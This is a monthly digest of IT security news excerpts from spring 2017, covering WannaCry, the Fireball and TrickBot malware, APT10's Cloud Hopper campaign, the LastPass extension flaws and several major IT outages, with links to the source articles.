FIREBALL MALWARE COULD SPARK GLOBAL CATASTROPHE AFTER INFECTING 250 MILLION COMPUTERS
(International Business Times, dated 1st June 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/fireball-malware-could-spark-global-catastrophe-after-infecting-250-million-computers-already-1624286

A massive malware campaign that has the power to "initiate a global catastrophe" has currently infected more than 250 million computers worldwide. The software, dubbed "Fireball", can take control of internet browsers, spy on victims' web use and potentially steal personal files.

According to Check Point, a cybersecurity firm, the operation is linked to Rafotech, a Chinese firm claiming to provide digital marketing and game apps to 300 million customers. It is allegedly using Fireball to manipulate victims' browsers, change search engines, and scoop up user data.

But experts warn the malware has the potential to cause a major cybersecurity incident worldwide.

-----------------------

(1st September 2017)


IT SECURITY REVIEW - MAY 2017

-----------------------
BA "GLOBAL IT SYSTEM FAILURE" IS DUE TO "POWER SUPPLY ISSUES"
(The Register, dated 27th May 2017 author "Register Reporter")

Full article [Option 1]:

www.theregister.co.uk/2017/05/27/ba_it_systems_failure_down_to_power_supply_issue/

British Airways CEO Alex Cruz has said the root cause of today's London flight-grounding IT systems ambi-cockup is "a power supply issue" and that the airline has "no evidence of any cyberattack".

The airline has cancelled all flights from London's Heathrow and Gatwick amid what BA has confirmed to The Register is a "global IT system failure".

BA has a very large IT infrastructure; it has over 500 data cabinets spread across six halls in two different sites near its Heathrow Waterside HQ.

BA has not specified where the power issues occurred and we have asked them about this.

The airline's IT teams are working "tirelessly" to fix the problems, said Cruz.

This time last year, BA tech union reps were pleading with the Home Office airline not to outsource IT jobs to Tata Consultancy Services in India.

-----------------------
SAINSBURY'S IT GLITCH SPOILS BANK HOLIDAY FOOD ORDERS
(The Register, dated 26th May 2017 author Kat Hall)

Full article [Option 1]:

www.theregister.co.uk/2017/05/26/sainsburys_it_glitch_ruins_bank_holiday_food_orders/

The sun is shining and the prospect of barbecue and beer over the bank holiday is almost in grabbing distance. But customers who ordered their groceries online with Sainsbury's today may be in for a disappointment.

Due to "technical issues", a number of online deliveries have been missed.

One insider got in touch with The Register to report that all Sainsbury's Groceries Online fulfilments were this morning being carried out via printouts rather than scanners, with shops having to run orders through tills manually.

That led to some major delays, with departure times for vans being missed. "People aren't going to be getting deliveries or will miss them because of the delays. This is affecting multiple if not all GOL [Groceries Online] stores," said the insider.

A Sainsbury's spokeswoman said that an earlier technical error means some customers' orders are being rebooked.

-----------------------
MAJOR INCIDENT AT CAPITA DATA CENTRE : MULTIPLE SERVICES STILL KNACKERED
(The Register, dated 26th May 2017 author Kat Hall)

Full article [Option 1]:

www.theregister.co.uk/2017/05/26/major_incident_at_capita_data_centre/

A major outage at a Capita data centre has knocked out multiple services for customers - including a number of councils' online services - for the last 36 hours.

Some of the sites affected include the NHS Business Services Authority, which apologised on its website for the continuing disruption and said it hoped its systems would be available by noon on Friday.

Sheffield City Council said on its website: "We're aware an off-site power failure is causing problems for customers trying to contact us".

The issues first emerged at 22:30 on Wednesday, affecting Capita Pay360 customers. The outsourcer said that was due to a "major incident at our data centre".

However, the impact appears to be much wider. One customer who asked not to be named said: "According to rumour, there was a power failure in West Malling and the generators failed, shutting the whole data centre down."

-----------------------
SAMSUNG S8 "EYE SECURITY" FOOLED BY PHOTO
(BBC News, dated 23rd May 2017)

Full article : www.bbc.co.uk/news/technology-40012990

Samsung's eye-scanning security technology, used on the new Galaxy S8 smartphone, has been fooled with a photograph and a contact lens.

The iris-scanner can be used to unlock the phone simply by looking at it, which Samsung says provides "airtight security". But researchers at Chaos Computer Club had easily tricked the device with a picture of an eye, Motherboard said.

Samsung told the BBC it was "aware of the issue".

The researchers first set up the phone's security by registering a volunteer's eyes using the S8 iris scanner.

They then took a photograph of one of the volunteer's eyes, using a digital camera with an infra-red night vision setting.

-----------------------
EU CYBERSECURITY AGENCY SEEKS FUNDS AND POWER TO POLICE ATTACKS
(Euractiv, dated 22nd May 2017 author Catherine Stupp)

Full article [Option 1]:

www.euractiv.com/section/cybersecurity/interview/eu-cybersecurity-agency-seeks-remit-funds-to-police-attacks/

The EU cybersecurity agency ENISA will receive a makeover in September when the European Commission renews its mandate amid a whirlwind of new cybersecurity measures. The director of the Athens-based agency has been requesting a larger budget to deal with the rise in attacks on internet-connected devices.

"It would be good to have seven days a week, 24 hour resources here," ENISA director Udo Helmbrecht said in an interview.

Helmbrecht called the EU response to the WannaCry ransomware hack, which affected thousands of people over a week ago, the first example of collaboration by authorities across the EU. National experts shared information and put out warnings to internet users over the weekend, he said.

-----------------------
MICROSOFT'S OLD SOFTWARE IS DANGEROUS. IS THERE A DUTY TO FIX IT?
(Fortune, dated 20th May 2017 author Jeff John Roberts)

Full article [Option 1]:

http://fortune.com/2017/05/20/microsoft-ransomware-legal/

A global ransomware epidemic is winding down, but questions over the fallout are just beginning. Who's to blame for the crisis that hijacked hundreds of thousands of computers? And can anyone stop such criminals, whose victims included hospitals and police, from striking again?

These aren't easy questions, but one company, Microsoft, has more explaining to do than most. After all, it was flaws in Windows systems that allowed hackers to carry out the ransomware attacks, which also struck companies and governments. In some cases, like the U.K.'s National Health Service, the frozen computers put lives at risk.

-----------------------
WANNACRY : EVERYTHING YOU STILL NEED TO KNOW
(The Register, dated 20th May 2017 author Iain Thomson)

Full article [Option 1]:

http://www.theregister.co.uk/2017/05/20/wannacry_windows_xp/

It has been a week since the Wannacry ransomware burst onto the world's computers - and security researchers think they have figured out how it all started.

Many assumed the nasty code made its way into organizations via email - either spammed out, or tailored for specific individuals - using infected attachments. Once accidentally opened, Wannacry would be installed, its worm features would kick in, and it would start the spread via SMB file sharing on the internal network.

However, the first iteration of the malware - the one that got into the railways, telcos, universities, the UK's NHS, and so on - required no such interaction. According to research by boffins at Malwarebytes, email attachments weren't used. Instead, the malware's operators searched the public internet for systems running vulnerable SMB services, and infected them using the NSA's leaked EternalBlue and DoublePulsar cyber-weapons. Once on those machines, Wannacry could be installed and move through internal networks of computers, again using EternalBlue and DoublePulsar, scrambling files as it went and demanding ransoms.

-----------------------
CANADIAN TELECOM BELL ADMITS HACKERS STOLE MORE THAN 1.9m ACTIVE EMAIL ADDRESSES
(International Business Times, dated 16th May 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/canadian-telecom-bell-admits-hackers-stole-more-1-9m-active-email-addresses-1621883

Bell, the largest telecommunications firm in Canada, has admitted that anonymous hackers were able to illegally steal approximately 1.9 million active email addresses and approximately 1,700 names and active phone numbers from its computer systems.

In a statement this week, published on 15 May, the firm said: "There is no indication that any financial, password or other sensitive personal information was accessed. This incident is not connected to the recent global 'WannaCry' malware attacks."

-----------------------
WANNACRY : SOMETIMES YOU CAN BLAME THE VICTIMS
(Computer World, dated 16th May 2017 author Ira Winkler)

Full article [Option 1]:

http://www.computerworld.com/article/3197048/cybercrime-hacking/wannacry-sometimes-you-can-blame-the-victims.html

The WannaCry ransomware attack has created at least tens of millions of dollars of damage, taken down hospitals, and as of the time of this writing, another round of attacks is considered imminent as people show up to work after the weekend. Of course, the perpetrators of the malware are to blame for all the damage and suffering that has resulted. It's not right to blame the victims of a crime, right?

Well, actually, there are cases when victims have to shoulder a portion of the blame. They may not be criminally liable as accomplices in their own victimhood, but ask any insurance adjuster whether a person or institution has a responsibility to take adequate precautions against actions that are fairly predictable. A bank that leaves bags of cash on the sidewalk overnight instead of in a vault is going to have a hard time getting indemnified if those bags go missing.

I should clarify that in a case such as WannaCry, there are two levels of victims. Take the U.K.'s National Health Service, for example. It was badly victimized, but the real sufferers, who are indeed blameless, are its patients. The NHS itself carries some blame.

-----------------------
PERFECT STORM OF RANSOMWARE
(Computer World, dated 16th May 2017 author Matt Hamblen)

Full article [Option 1]:

http://www.computerworld.com/article/3196119/security/perfect-storm-of-ransomware-and-network-worm-hits-unprotected-computers-globally.html

The cruel reality of a global ransomware attack that crippled computer systems in 150 countries on Friday is this: Attackers took advantage of under-prepared computer users and their organizations.

Enterprises -- including manufacturers, car makers, hospitals and government agencies -- were running older versions of Windows or hadn't patched even the newest Windows versions with a patch that Microsoft released in March.

And, truth be told, some unsuspecting users evidently clicked on email links or, more likely, a suspected compressed Zip file attachment that launched the ransomware known as WannaCry, also known as WannaCrypt or WannaCrypto.

-----------------------
MICROSOFT ISSUES FIRST WINDOWS XP PATCH IN 3 YEARS TO STYMIE "WANNACRYPT"
(Computer World, dated 14th May 2017 author Gregg Keizer)

Full article [Option 1]:

http://www.computerworld.com/article/3196292/windows-pcs/microsoft-issues-first-windows-xp-patch-in-3-years-to-stymie-wannacrypt.html

Microsoft on Friday took the unprecedented step of issuing patches for long-demoted versions of Windows, including Windows XP, to immunize PCs from fast-spreading ransomware that has crippled machines worldwide.

To stymie "WannaCrypt" attacks -- which encrypted files on thousands of PCs used by the U.K.'s National Health Service (NHS), causing chaos in many hospitals -- Microsoft published patches for Windows XP, Windows 8 and Windows Server 2003. All had been retired from support: Windows XP in April 2014, Windows 8 in June 2016, Windows Server in July 2015.

-----------------------
UK, NETHERLANDS EMERGE AS GROWING HOTSPOTS FOR ORIGINATING CYBERATTACKS
(IBM - Security Intelligence, dated 11th May 2017 author Douglas Bonderud)

Full article [Option 1]:

https://securityintelligence.com/news/uk-netherlands-emerge-as-growing-hotspots-for-originating-cyberattacks/

Europe is climbing the charts, but it's not in a desirable category for EU member countries. According to a recent NTT Security report, more than half of the world's phishing attacks now originate from the Europe, Middle East and Africa region (EMEA).

The Netherlands is ground zero for this type of attack, having suffered 38 percent of noted phishing attacks, which is second only to the U.S. The U.K. also took second spot behind the U.S. in total number of cyberattacks.

-----------------------
FACEBOOK TO HIRE 3,000 EXTRA PEOPLE TO TACKLE LIVE CRIME AND SUICIDE VIDEOS
(International Business Times, dated 3rd May 2017 author Alistair Charlton)

Full article [Option 1]:

www.ibtimes.co.uk/facebook-hire-3000-extra-people-tackle-live-crime-suicide-videos-1619836

Facebook is to hire an additional 3,000 people over the next year to review reports of graphic, disturbing and inappropriate videos uploaded to the social network and broadcast using Facebook Live.

Chief executive Mark Zuckerberg made the announcement on his own Facebook page, and explained that the reviewers will improve the social network's ability to provide help to users who need it, and "get better at removing things we don't allow... like hate speech and child exploitation."

The 3,000 people will join a team of 4,500 already employed by Facebook to remove content which breaches the company's guidelines.
-----------------------

(1st June 2017)


IT SECURITY REVIEW - APRIL 2017

-----------------------
TRICKBOT MALWARE NOW TARGETING 20 NEW UK BANKS IN FRESH CYBERCRIME SPREE, IBM WARNS
(International Business Times, dated 28th April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/trickbot-malware-now-targeting-20-new-uk-banks-fresh-cybercrime-spree-ibm-warns-1619186

Security researchers from IBM Security have warned that a strain of banking Trojan, dubbed TrickBot, is escalating attacks against UK banks and financial institutions. The operators of the malware have launched five campaigns this month alone, it has been revealed.

In its current configuration, the financial Trojan is targeting a slew of private banks, wealth management firms, investment companies and insurance businesses, claimed Limor Kessem, one of the top cyber-intelligence experts at IBM's X-Force, in a blog post this week (27 April).

One of the UK targets, although left unnamed, is reportedly one of the "oldest banks in the world."

"The operators have been doing a lot of homework," Kessem continued. "TrickBot has added 20 new private banking brands to its regular attack roster, as well as eight building societies," she added.

Other recently added targets included two Swiss banks and four investment firms in the US.


-----------------------
SEVEN IN TEN UK UNIVERSITIES ADMIT BEING DUPED BY PHISHING ATTACKS
(The Register, dated 27th April 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/04/27/uk_uni_phishing_foi/

Seven in ten UK universities have admitted falling victim to a phishing attack in which an individual has been tricked into disclosing personal details via an email purporting to be from a trusted source.

The figure comes from a Freedom of Information (FoI) request by Duo Security to 70 universities across the UK, of which 51 responded. Seven universities, including those with GCHQ-certified degree courses - Oxford and Cranfield University - reported they had been targeted more than 50 times in the 12 months prior to November 2016.

The findings, released Wednesday, follow a recent warning from Action Fraud, the UK's fraud and cybercrime reporting centre, about a phishing scam specifically targeting UK university staff. The bogus email claims the recipient is due for a pay increase, before directing them to click on a link and enter financial details and university logins.

-----------------------
WHY DID TURKISH HACKERS TAKE DOWN A UK PRIMARY SCHOOL WEBSITE ?
(International Business Times, dated 24th April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/why-did-turkish-hackers-take-down-uk-primary-school-website-1618317

An investigation has been launched by police in Sussex, UK, after a rogue group of alleged Turkish hackers targeted the website of a local primary school. Law enforcement said it may offer reassurance patrols after the "malicious" incident left parents concerned.

The website of North Mundham Primary in Chichester was defaced to show a white background with a red badge-shaped logo often associated with a group called "Ayyildiz Tim".

It displayed a message, which contained an English translation, including the statement: "Hello admin system hacked."

An explainer at the bottom of the website consisted of a lengthy statement by those purporting to be Ayyildiz Tim about using cyberattacks as a "lobbying" force.

-----------------------
RUSSIA HACKED DANISH DEFENCE MINISTRY EMAILS FOR 2 YEARS
(International Business Times, dated 24th April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/russia-hacked-danish-defence-ministry-emails-2-years-1618378

Denmark's defence minister, Claus Hjort Frederiksen, has directly accused the Russian government of launching "aggressive" cyberattacks against his country after an intelligence report claimed that Kremlin-linked hackers had, for two years, targeted government email accounts.

"What's happening is very controlled. It's not small hacker groups doing it for the fun of it," Frederiksen told Berlingske newspaper. "It's connected to intelligence agencies or central elements in the Russian government, and holding them off is a constant struggle," he added.

Speaking to Danish news agency Ritzau, he added: "This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia."

On 23 April (Sunday), the Centre for Cyber Security (CFCS), a fork of the Danish Defence Intelligence Service (DDIS), claimed pro-Kremlin hacking teams infiltrated the emails of defence ministry personnel for an undisclosed period of time between 2015 and 2016.

-----------------------
INTERPOL-LED OPERATION FINDS NEARLY 9,000 INFECTED SERVERS IN SOUTHEAST ASIA
(Reuters, dated 24th April 2017)

Full article [Option 1]:

http://uk.reuters.com/article/us-singapore-interpol-cyber-idUKKBN17Q1BT

An anti-cybercrime operation by Interpol and investigators from seven southeast Asian nations revealed nearly 9,000 malware-laden servers and hundreds of compromised websites in the ASEAN region, Interpol said on Monday.

Various types of malware, such as that targeting financial institutions, spreading ransomware, launching Distributed Denial of Service (DDoS) attacks and distributing spam were among the threats posed by the infected servers, the operation showed.

"This operation helped participants identify and address various types of cybercrime which had not previously been tackled in their countries," said Francis Chan, head of the Hong Kong Police Force's cybercrime unit and chairman of Interpol's Eurasian cybercrime working group.

-----------------------
GERMAN CYBER CRIME REPORTEDLY ROSE 80% IN 2016
(Daily Mail, dated 23rd April 2017 author Reuters)

Full article [Option 1]:

www.dailymail.co.uk/wires/reuters/article-4438246/German-cyber-crime-rose-80-pct-2016-report.html

The German government registered 82,649 cases of computer fraud, espionage and other cyber crimes in 2016, an increase of just over 80 percent from 2015, a German newspaper reported on Sunday.

German Interior Minister Thomas de Maiziere is due to release the new statistics, part of the government's annual crime report, on Monday, according to Die Welt newspaper.

In addition to cyber crime, German police also registered 253,290 cases of crimes carried out with the help of the internet, an increase of 3.6 percent from 2015, the newspaper reported.

-----------------------
THOUSANDS EXPOSED TO HACKERS BY WIFI ROUTERS
(The Independent, dated 20th April 2017 author Aatif Sulleyman)

Full article [Option 1]:

www.independent.co.uk/life-style/gadgets-and-tech/news/wifi-hackers-risk-linksys-routers-exposed-a7691496.html

Security researchers have discovered a range of vulnerabilities affecting a range of Wi-Fi routers.

Both "high-risk" and "low-risk" issues have been uncovered in more than 20 different Linksys router models, over 7,000 of which were "exposed on the internet" when the research was conducted in the fourth quarter of 2016.

The vulnerabilities could allow cybercriminals to leak information about devices connected to the router, as well as overload the router itself and deny access to a user.

-----------------------
IT ADMINISTRATOR SET "TIME BOMB" MALWARE TO TORPEDO EX-EMPLOYER'S YEAR END AUDIT
(International Business Times, dated 18th April 2017 author Mary-Ann Russon)

Full article [Option 1]:

www.ibtimes.co.uk/it-administrator-set-time-bomb-malware-torpedo-ex-employers-year-end-audit-1617499

There's a reason companies should fear disgruntled employees - they can really harm your business. An IT systems administrator is being sued by his former employer for allegedly installing malware that automatically deleted critical financial data after he left.

Semiconductor manufacturer Allegro Microsystems has filed a lawsuit against Nimesh Patel, who worked for the company for 14 years from August 2002 to January 2016. The lawsuit (first spotted by Bleeping Computer) alleges that Patel was given three laptops to use during his time at the company.

Patel resigned from his position, and when he left the company on 8 January 2016, he returned the two business laptops. However, he kept the third laptop, which had been designated for personal use, with the company's blessing.

However, Allegro alleges that on 31 January 2016, Patel returned to the grounds of the Allegro headquarters in Worcester, Massachusetts with the third laptop and used it to access the company's Wi-Fi network.

-----------------------
RUSSIAN BUILT MALWARE CAN GIVE HACKER FULL REMOTE ACCESS TO ANDROID SMARTPHONE
(International Business Times, dated 11th April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/russian-built-malware-can-give-hackers-full-remote-access-your-android-smartphone-1616583

Providing a glimpse into a Russian-built malware campaign, a team of security researchers has analysed an Android-based adware family, discovering it's more dangerous than previously known. It could potentially give hackers "full remote access" on an infected device.

The cybercriminals behind "multiple" new strains of an advertising malware (adware) codenamed "Ewind" take a simple but effective approach to infecting unwitting users: downloading legitimate applications, tearing them apart and repackaging them with malicious code.

-----------------------
GERMANY ROLLS OUT NEW CYBER DEFENCE TEAM
(Euractiv, dated 6th April 2017 author Andreas Maisch)

Full article [Option 1]:

www.euractiv.com/section/cybersecurity/news/germany-rolls-out-new-cyber-defence-team/

Germany's army was targeted 284,000 times by cyber attacks in the first three months of 2017. Yesterday (5 April), the Bundesrepublik's new cyber defence unit was officially put into action. But its offensive capabilities are already under scrutiny. EURACTIV Germany reports.

The new commando unit is set to be 13,500 personnel strong by July. By comparison, its marine corps has around 16,000 soldiers and the air force 28,000.

Germany hopes to be a model for other European armed forces to follow in dealing with cyber attacks.

German lawmakers said that the new unit will focus on combatting Russian hacking. It will be led by Ludwig Leinhos, a seasoned veteran of the armed forces and the country's highest-ranking cyber-general.

-----------------------
GCHQ BOSS : "WE GET CRAZY THEORIES THROWN AT US EVERY DAY"
(BBC News, dated 5th April 2017 author Gordon Corera)

Full article : www.bbc.co.uk/news/uk-39508851

The operations centre sits on one of the upper floors of GCHQ and runs 24/7. At any one time, a team of analysts might be monitoring the kidnap of a British citizen abroad or an ongoing counter-terrorist operation run jointly with MI5.

In one corner, a large globe visualises all the cyber attacks targeting the UK from around the world. The room is a reminder of the range of activity that GCHQ is involved in - as well as its global reach in monitoring communications and data flows.

Russian cyber attacks are high up the agenda, in the wake of claims Moscow interfered in the US election and is trying the same in Europe.

"The scale has changed. They've invested a lot of money and people in offensive cyber behaviour and critically they've decided to do reckless and interfering things in European countries."

Mr Hannigan says that whilst it is impossible to be absolutely sure, the defences against such attacks seem to have held in the UK.

-----------------------
UK AND SWEDISH WATCHDOGS WARN OF INTERNATIONAL CYBER ATTACK
(Reuters, dated 5th April 2017)

Full article [Option 1]: www.reuters.com/article/us-sweden-cyber-idUSKBN17714Y

A large-scale cyber attack from a group targeting organizations in Japan, the United States, Sweden and many other European countries through IT services providers has been uncovered, the Swedish computer security watchdog said on Wednesday.

The cyber attack, uncovered through a collaboration by Britain's National Cyber Security Centre, PwC and cyber security firm BAE Systems, targeted managed service providers to gain access to their customers' internal networks since at least May 2016 and potentially as early as 2014.

The exact scale of the attack, named Cloud Hopper from an organization called APT10, is not known but is believed to involve huge amounts of data, Sweden's Civil Contingencies Agency said in a statement. The agency did not say whether the cyber attacks were still happening.

-----------------------
FRANCE HAS A "FOURTH ARMY" OF YOUNG HACKERS FOR CYBER WARFARE
(Business Insider, dated 5th April 2017 author Marine Pennetier, Reuters)

Full article [Option 1]:

http://uk.businessinsider.com/france-is-grooming-a-fourth-army-of-young-hackers-for-cyber-warfare-2017-4

Huddled around their computers, two dozen French 20-somethings have been typing away feverishly for seven hours. Their objective is clear. Eliminate a virus crippling the systems of a government environmental agency.

"Mission accomplished! They have done what they were asked to do. Analyze, identify and then develop a code that wipes it out," says Patrice, a French military officer testing potential recruits at a cyber defense center in western France.

The exercise was one of dozens held across the country between March 20 and 31, involving 240 people from 12 elite technology colleges, part of a plan to create an army of talented cyber spies to counter digital destabilization efforts.

-----------------------
GERMAN MILITARY HIT WITH NEARLY 300,000 CYBERATTACKS SO FAR IN 2017
(International Business Times, dated 3rd April 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/german-military-hit-nearly-300000-cyberattacks-so-far-2017-cyber-chief-warns-1615085

The head of the German military's new cyber command, Lieutenant General Ludwig Leinhos, has revealed that army computers were targeted hundreds of thousands of times in the first nine weeks of 2017, amid rising fears that Russia-linked hackers are stepping up their activity.

"From hacker attacks to state attacks, we must be prepared for everything," Leinhos told German publication Bild on 2 April (Sunday). "In the first nine weeks of this year alone, Bundeswehr [armed forces] computers were attacked more than 284,000 times."

He did not specify what types of cyberattacks hit the sensitive computer networks, but the military later indicated no classified material was compromised.

-----------------------
SERIOUS HACK ATTACKS FROM CHINA TARGETING UK FIRMS
(BBC News, dated 3rd April 2017)

Full article : www.bbc.co.uk/news/technology-39478975

UK firms have been warned about "serious" cyber attacks originating in China that seek to steal trade secrets.

The gang behind the attacks has compromised technology service firms and plans to use them as a proxy for attacks, security firms have said.

The group, dubbed APT10, is using custom-made malware and spear phishing to gain access to target companies.

The National Cyber Security Centre and cyber units at PwC and BAE Systems collaborated to identify the group.

"Operating alone, none of us would have joined the dots to uncover this new campaign of indirect attacks," said Richard Horne, cyber security partner at PwC.

-----------------------
OPERATION CLOUD HOPPER
(PwC, dated April 2017)

Full article [Option 1]:

https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html

PwC's cyber security practice has worked closely with BAE Systems and other members of the security community, along with the UK's National Cyber Security Centre (NCSC), to uncover and disrupt what is thought to be one of the largest ever sustained global cyber espionage campaigns in an operation referred to as 'Operation Cloud Hopper'.

Since late 2016, PwC and BAE Systems have been collaborating to research the threat, brief the global security community and assist known victims. The threat actor behind the campaign is widely known within the security community as 'APT10', referred to within PwC UK as 'Red Apollo'.

The espionage campaign has targeted managed IT service providers (MSPs), allowing the APT10 group unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally. This indirect approach of reaching many through only a few targets demonstrates a new level of maturity in cyber espionage - so it's more important than ever to have a comprehensive view of all the threats your organisation might be exposed to, either directly or through your supply chain.

-----------------------
FINNISH SECRET SERVICE WARNS THAT RUSSIAN HACKERS AND SPIES COULD BE POSING AS YOUR BEST FRIEND
(International Business Times, dated 31st March 2017 author Mary-Ann Russon)

Full article [Option 1]:

www.ibtimes.co.uk/finnish-secret-service-warns-that-russian-hackers-spies-could-be-posing-your-best-friend-1614748

Finland's secret police claim that foreign espionage is on the rise, to the extent that Russian nation state hackers are working together with spies to befriend unsuspecting Finns so they can extract sensitive information and trade secrets about Finnish government agencies and companies from them.

The Finnish Security Intelligence Service (known as Supo) has released a report reviewing its efforts to protect national security in 2016. One key section in the report relates to an increase in foreign state actors who have been detected trying to hack into Finnish computer networks to gain access to sensitive data.

In particular, Supo has highlighted cyber-intrusions made by APT28, a notorious Russian hacking group also dubbed Fancy Bear, which is hacking into Finnish networks frequently and without even bothering to hide its tracks. Multiple cybersecurity firms believe that this group is linked to the Kremlin's intelligence services, following comprehensive analysis of the hackers' techniques and choice of malware.

-----------------------

(1st June 2017)


IT SECURITY REVIEW - MARCH 2017

-----------------------
HACKERS ATTEMPTED TO ATTACK GERMAN PARLIAMENT IN JANUARY
(International Business Times, dated 30th March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-attempted-attack-german-parliament-january-via-compromised-israeli-news-site-1614389

Hackers reportedly targeted the German parliament with new cyberattacks as recently as January. The malvertising campaign saw hackers use a compromised Israeli news site to redirect users to a malicious site. However, cyber defences incorporated after the parliament was hacked in 2015 reportedly helped officials thwart the cyberattack, according to the German cybersecurity watchdog.

According to the Federal Office for Information Security (BSI), unusual activity on the parliament's network was investigated earlier in the year. The hackers allegedly manipulated the website of the Jerusalem Post, redirecting those clicking on advertising run on the site to a malicious website, Reuters reported.

-----------------------
RANSOMWARE FOUND IN DUTCH PARLIAMENT
(NL Times, dated 28th March 2017 author Janene Pieters)

Full article [Option 1]:

http://nltimes.nl/2017/03/28/ransomware-found-dutch-parliament

Ransomware was found on the computer systems of the Tweede Kamer, the lower house of Dutch parliament, a spokesperson for the Kamer confirmed to various news sources after D66 parliamentarian Kees Verhoeven posted about it on Twitter. Exactly what happened is unclear, but according to Tweakers, the problems are largely solved.

"The Kamer already took appropriate measures. As usual, we can not discuss it further because of safety", the Kamer spokesperson said to NOS.

An internal Tweede Kamer email, which broadcaster NOS got its hands on, shows that the ransomware did manage to encrypt some files. "We are dealing with ransomware which addressed significant attacks on us (and according to Fox-IT some companies) and which unfortunately encrypted files", the email reads, according to NOS. "The mail is now blocked. Currently we are analyzing the damage. Then we will repair the damage. We will do this by replacing the infected files with a backup."

-----------------------
MILLIONS OF ACCOUNTS FROM 25 HACKED vBULLETIN FORUMS BEING "SOLD" ON THE DARK WEB
(International Business Times, dated 27th March 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/millions-accounts-25-hacked-vbulletin-forums-being-sold-dark-web-1613849

The dark web has allegedly been flooded with millions of accounts from recently compromised vBulletin forums. A hacker, going by the pseudonym "Cfnt", has reportedly claimed to have hacked 25 web forums, which were running on outdated versions of the vBulletin software.

The alleged hacked forums belong to various categories, including fitness, technology, network security, gaming, animations and entertainment. Among those compromised are forums such as Subagames.com, rappers.in, forums.spybot.info, cashcrate.com, codingforums.com, dcemu.co.uk, asia-team.net, dbforums.com and forums.3dtotal.com, HackRead reported.

-----------------------
CRITICAL SECURITY FLAW TURNS ALL ANTIVIRUS SOFTWARE AGAINST YOU
(International Business Times, dated 24th March 2017)

Full article [Option 1]:

www.ibtimes.co.uk/double-agent-critical-zero-day-security-flaw-turns-all-antivirus-software-against-you-1613526

Cybersecurity researchers have discovered a zero-day vulnerability that would enable attackers to gain access to many major antivirus software brands on the market today and use the software to hijack a user's computer.

Researchers from Israel-based cybersecurity firm Cybellum have found that a 15-year-old legitimate feature of Windows called Microsoft Application Verifier that exists in every single version of the operating system can be exploited to enable hackers to inject malicious code into computers.

Instead of trying to hide from antivirus software, the technique enables attackers to seize control of the antivirus and install malware that hijacks the user's machine to do pretty much anything the hacker wants, from installing backdoors to sending data out to the hacker's server or stealing and encrypting user data.

The flaw affects all major antivirus products like Avast, AVG, Avira, Bitdefender, Comodo, ESET, F-Secure, Kaspersky, Malwarebytes, McAfee, Norton, Panda, Quick Heal and Trend Micro, as well as many other small brands.

Malwarebytes, AVG, Trend Micro, Kaspersky Lab, ESET and Avast have all issued statements that they have patched the bug, while Comodo and Symantec claim that their products were either not vulnerable or provide protections able to negate such an attack.

In the case of Norton, owned by Symantec, this is particularly interesting, seeing as the researchers claim their proof of concept demonstration was able to take over the latest version of Norton Antivirus.

-----------------------
GOOGLE AND SYMANTEC CLASH ON WEBSITE SECURITY CHECKS
(BBC News, dated 24th March 2017)

Full article : www.bbc.co.uk/news/technology-39365315

Search giant Google and security firm Symantec have clashed over the way websites are kept secure.

Google claims Symantec has done a poor job of using standard tools, called certificates, that check the identity of thousands of websites.

It will change its Chrome browser to stop recognising some Symantec certificates, causing problems for people who visit sites using them.

Symantec said Google's claims were "exaggerated" and "irresponsible".

The row concerns identity checks known as "security certificates", which underlie the HTTPS system that ensures data is encrypted as it travels to and from a website.

Symantec is one of the biggest issuers of basic security certificates as well as their extended versions, which are supposed to give users more confidence in the security of a site.

-----------------------
APPLE SAYS ITS SYSTEMS HAVE NOT BEEN BREACHED AS HACKERS THREATEN TO WIPE DATA FROM MILLIONS OF iPHONES
(International Business Times, dated 23rd March 2017 author Hyacinth Mascarenhas)

Full article [Option 1]:

www.ibtimes.co.uk/apple-says-its-systems-have-not-been-breached-hackers-threaten-wipe-data-millions-iphones-1613276

Apple has responded to claims that a hacker group has gained access to hundreds of millions of iCloud and other Apple email accounts stating that none of its systems were breached. Hackers going by the name 'Turkish Crime Family' claimed earlier in the week that they had gained access to more than 300 million Apple email accounts including iCloud and @me domains.

Motherboard first reported that the group demanded a $75,000 (£59,932) ransom in Bitcoin or Ethereum and threatened to remotely wipe millions of iCloud accounts if Apple did not pay up by 7 April. They said they were willing to accept $100,000 worth of iTunes gift cards as payment.

-----------------------
PASSWORD-STEALING FLAWS IN LASTPASS CHROME AND FIREFOX EXTENSIONS
(Computer World, dated 22nd March 2017 author Darlene Storm)

Full article [Option 1]:

www.computerworld.com/article/3183586/security/password-stealing-flaws-in-lastpass-chrome-and-firefox-extensions.html

Tavis Ormandy, a security researcher on Google's Project Zero team, warned of flaws in LastPass browser extensions, vulnerabilities which - if a person surfed to a malicious site - would allow the malicious site to steal passwords from the password manager.

LastPass said it patched the vulnerability in its Chrome extension and said it is working on a fix for the flaw in its Firefox add-on.

Ormandy originally said the LastPass bug affected 4.1.42 Chrome and Firefox browser extensions. He developed a working exploit for a Windows box running the LastPass Chrome extension, but said it "could be made to work on other platforms."

********UPDATE 1********

LASTPASS FIXES SERIOUS PASSWORD LEAK FLAWS
(Computer World, dated 22nd March 2017 author Lucian Constantin)

Full article [Option 1]:

http://www.computerworld.com/article/3183602/security/lastpass-fixes-serious-password-leak-flaws.html

Developers of the popular LastPass password manager rushed to push out a fix to solve a serious vulnerability that could have allowed attackers to steal users' passwords or execute malicious code on their computers.

********UPDATE 2********

LASTPASS IS SCRAMBLING TO FIX ANOTHER SERIOUS VULNERABILITY
(Computer World, dated 28th March 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3185463/security/lastpass-is-scrambling-to-fix-another-serious-vulnerability.html

For the second time in two weeks, developers of the popular LastPass password manager are working to fix a serious vulnerability that could allow malicious websites to steal user passwords or infect computers with malware.

-----------------------
